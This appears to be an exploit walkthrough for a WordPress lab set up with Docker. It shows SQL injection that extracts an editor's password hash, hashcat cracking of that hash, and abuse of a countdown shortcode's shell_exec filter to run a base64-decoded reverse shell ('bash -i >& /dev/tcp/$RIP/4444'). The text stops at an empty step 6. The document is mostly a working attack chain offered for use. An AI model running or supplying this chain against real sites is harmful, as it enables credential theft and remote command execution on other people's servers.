Share
## https://sploitus.com/exploit?id=DD8942C8-640E-5EBF-AD31-277A1F21F990
# CVE Session 1

## How to Run exploit

### 1. Build the docker image

```bash
docker-compose up -d --build
```

Now You can confirm you have access to the WordPress server at: http://localhost:8080

### 2. Run the script to get editor's credential by SQLi

Assuming that we are in the Linux OS.
```bash
./script.sh
```

### 3. Run hashcat to crack the hash

```bash
# create target_hash.txt 
echo $extracted_hash > target_hash.txt
# hashcrack 
hashcat -m 400 target_hash.txt Pwdb_top-1000.txt
```

### 4. Login to the WordPress Server as "editor"

  * **Username:** `Mike`
  * **Email:** `mike@example.com`
  * **Password:** `test123`
  * **Role:** `Editor`

### 5. Create a new post with shortcode

reverse shell
base64 encode this! -> bash -i >& /dev/tcp/$RIP/4444 0>&1
```wordpress
[countdown date=2025/12/31 filter=shell_exec]echo  | base64 -d | /usr/bin/bash[/countdown]
```

### 6.